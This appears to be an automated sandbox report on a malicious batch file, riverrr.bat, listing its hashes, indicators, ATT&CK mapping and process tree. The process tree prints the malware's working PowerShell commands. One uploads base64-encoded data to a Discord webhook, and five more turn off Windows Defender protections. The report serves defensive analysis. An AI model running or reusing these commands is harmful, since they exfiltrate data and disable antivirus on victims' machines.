93e8750b3a7c51c0f588908f39d89e1e51650c475c9376ed3f71e7c9945ed00a

General

Target

riverrr.bat
Size

5KB
MD5

fc498e2bdba1e606ec3a8279694de87a
SHA1

005a4e7517f8760b92bf92255224c3a51a9d5cf6
SHA256

93e8750b3a7c51c0f588908f39d89e1e51650c475c9376ed3f71e7c9945ed00a
SHA512

8b3dc61a95224129da7df6240cde12aa4dcf20fc0e37d277f1d92d152f537a751ee11eb4d8281335cb3eb728b4810d38c73914435167cd8e8f29d8e0139401be
SSDEEP

96:OyPPks5E5hngSMz6p5dvxiaXa05CACvEMRu5CECvElCw2+c:tPPQrp5dvkaXa05CACvEMI5CECvEMw4

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://discord.com/api/webhooks/1152857858543718450/qR3bD0V-wMFzOw9cnKsF3KjME7YhDRXOkZep_Oy4ztLtCIN3pK5i3wdOMzSNp6Ry3Xvv

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	1196	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1196	powershell.exe
1196	powershell.exe
2032	powershell.exe
2032	powershell.exe
4800	powershell.exe
4800	powershell.exe
4864	powershell.exe
4864	powershell.exe
5056	powershell.exe
5056	powershell.exe
1524	powershell.exe
1524	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1896 wrote to memory of 1196	1896	cmd.exe	85
PID 1896 wrote to memory of 1196	1896	cmd.exe	85
PID 1896 wrote to memory of 2032	1896	cmd.exe	87
PID 1896 wrote to memory of 2032	1896	cmd.exe	87
PID 1896 wrote to memory of 4800	1896	cmd.exe	88
PID 1896 wrote to memory of 4800	1896	cmd.exe	88
PID 1896 wrote to memory of 4864	1896	cmd.exe	90
PID 1896 wrote to memory of 4864	1896	cmd.exe	90
PID 1896 wrote to memory of 5056	1896	cmd.exe	92
PID 1896 wrote to memory of 5056	1896	cmd.exe	92
PID 1896 wrote to memory of 1524	1896	cmd.exe	94
PID 1896 wrote to memory of 1524	1896	cmd.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\riverrr.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -c "$client = New-Object System.Net.WebClient;$client.UploadString('https://discord.com/api/webhooks/1152857858543718450/qR3bD0V-wMFzOw9cnKsF3KjME7YhDRXOkZep_Oy4ztLtCIN3pK5i3wdOMzSNp6Ry3Xvv',(New-Object System.Text.ASCIIEncoding).GetString([System.Convert]::FromBase64String('JABzAD0AcwB0AGEAbgBzAC4AbgBlAHQALgBXAGUAYgBvAGQAZQBjAHQAIAB8ACAAWwBTAHQAYQBuAHMAaABWAGUAZQBtAGUAbgB0AC4ARwBlAGQAdAAuAE4AZQB0AFMAbwBmAHQAXQAuAEcAZQB0AEYAaQBsAGUAUwB0AGEAbgBzAHQAaQB0ACgAJABDAG8AbQBwAHIAZQBzAHMAKQA=')))"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableIOAVProtection $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableArchiveScanning $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableBehaviorMonitoring $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableRemovableDriveScanning $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
49e7d5f2a296b59afec08bc314bed998

SHA1
7f898bf195ffd46ce2d19fad0ce33155f6e47f5f

SHA256
394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe

SHA512
f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
64ec213a8ef039617920b2f2eb1e37d7

SHA1
b2e11596266ab56ba953c896cf9d868864ee2aa8

SHA256
5a629b3588081039c213d5407fe1b52e16c380af6539f69cab0262acd5886491

SHA512
c524e0c776bf4473ce69688d620d3beb43d14b92c77f98f8737ead9e5d2af6ed34c0073dac15545daf666bbde3ca06675533509aac8f84a547e97a5f13921553

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8c9337215dd1003e764138fb79e1cede

SHA1
ad9beead781140ddee69fd99627e5658060b707f

SHA256
69a4ddee22fb149d89baadad38568b3420b9c8acc5976520ce5bb8982b80ff89

SHA512
fc8d90b49a49525ca87942caba468dddf1ac5a3d4423e7749263a0f81616e560db35af6cafb87beed6ab10ef029490329ab76d8ba4245a9f4b8942190503b508

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d14ccefeb263594e60b1765e131f7a3

SHA1
4a9ebdc0dff58645406c40b7b140e1b174756721

SHA256
57cd435c8b2bf10a2c77698301789c032e1b6b623ff1420c72e8bca0b10f1e5c

SHA512
2013a26123f72a4106524fd9d7389ac4654f97033d22707efc084fb2a3ad01c298eb64f01bb64861ab603615022dbe7cfc97475346edb16b3ba72e905127f101

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e60eb305a7b2d9907488068b7065abd3

SHA1
1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

SHA256
ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

SHA512
95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5cfe303e798d1cc6c1dab341e7265c15

SHA1
cd2834e05191a24e28a100f3f8114d5a7708dc7c

SHA256
c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

SHA512
ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bipwi4bv.dyw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1196-13-0x0000026065220000-0x0000026065230000-memory.dmp

Filesize
64KB

Download
memory/1196-12-0x0000026065220000-0x0000026065230000-memory.dmp

Filesize
64KB

Download
memory/1196-10-0x00007FF90B2B0000-0x00007FF90BD71000-memory.dmp

Filesize
10.8MB

Download
memory/1196-16-0x00007FF90B2B0000-0x00007FF90BD71000-memory.dmp

Filesize
10.8MB

Download
memory/1196-11-0x0000026065220000-0x0000026065230000-memory.dmp

Filesize
64KB

Download
memory/1196-9-0x00000260654A0000-0x00000260654C2000-memory.dmp

Filesize
136KB

Download
memory/1524-97-0x00007FF90AF80000-0x00007FF90BA41000-memory.dmp

Filesize
10.8MB

Download
memory/1524-95-0x000002077A4A0000-0x000002077A4B0000-memory.dmp

Filesize
64KB

Download
memory/1524-90-0x000002077A4A0000-0x000002077A4B0000-memory.dmp

Filesize
64KB

Download
memory/1524-83-0x000002077A4A0000-0x000002077A4B0000-memory.dmp

Filesize
64KB

Download
memory/1524-82-0x00007FF90AF80000-0x00007FF90BA41000-memory.dmp

Filesize
10.8MB

Download
memory/2032-27-0x00007FF90B2B0000-0x00007FF90BD71000-memory.dmp

Filesize
10.8MB

Download
memory/2032-33-0x00007FF90B2B0000-0x00007FF90BD71000-memory.dmp

Filesize
10.8MB

Download
memory/2032-31-0x000001E667BF0000-0x000001E667C00000-memory.dmp

Filesize
64KB

Download
memory/2032-30-0x000001E667BF0000-0x000001E667C00000-memory.dmp

Filesize
64KB

Download
memory/2032-28-0x000001E667BF0000-0x000001E667C00000-memory.dmp

Filesize
64KB

Download
memory/4800-47-0x0000023BCF2A0000-0x0000023BCF2B0000-memory.dmp

Filesize
64KB

Download
memory/4800-50-0x00007FF90AF80000-0x00007FF90BA41000-memory.dmp

Filesize
10.8MB

Download
memory/4800-43-0x00007FF90AF80000-0x00007FF90BA41000-memory.dmp

Filesize
10.8MB

Download
memory/4800-44-0x0000023BCF2A0000-0x0000023BCF2B0000-memory.dmp

Filesize
64KB

Download
memory/4800-45-0x0000023BCF2A0000-0x0000023BCF2B0000-memory.dmp

Filesize
64KB

Download
memory/4800-48-0x0000023BCF2A0000-0x0000023BCF2B0000-memory.dmp

Filesize
64KB

Download
memory/4864-65-0x00007FF90AF80000-0x00007FF90BA41000-memory.dmp

Filesize
10.8MB

Download
memory/4864-62-0x000001BAF9210000-0x000001BAF9220000-memory.dmp

Filesize
64KB

Download
memory/4864-61-0x000001BAF9210000-0x000001BAF9220000-memory.dmp

Filesize
64KB

Download
memory/4864-60-0x00007FF90AF80000-0x00007FF90BA41000-memory.dmp

Filesize
10.8MB

Download
memory/5056-67-0x000002557EBB0000-0x000002557EBC0000-memory.dmp

Filesize
64KB

Download
memory/5056-81-0x00007FF90AF80000-0x00007FF90BA41000-memory.dmp

Filesize
10.8MB

Download
memory/5056-79-0x000002557EBB0000-0x000002557EBC0000-memory.dmp

Filesize
64KB

Download
memory/5056-68-0x000002557EBB0000-0x000002557EBC0000-memory.dmp

Filesize
64KB

Download
memory/5056-66-0x00007FF90AF80000-0x00007FF90BA41000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing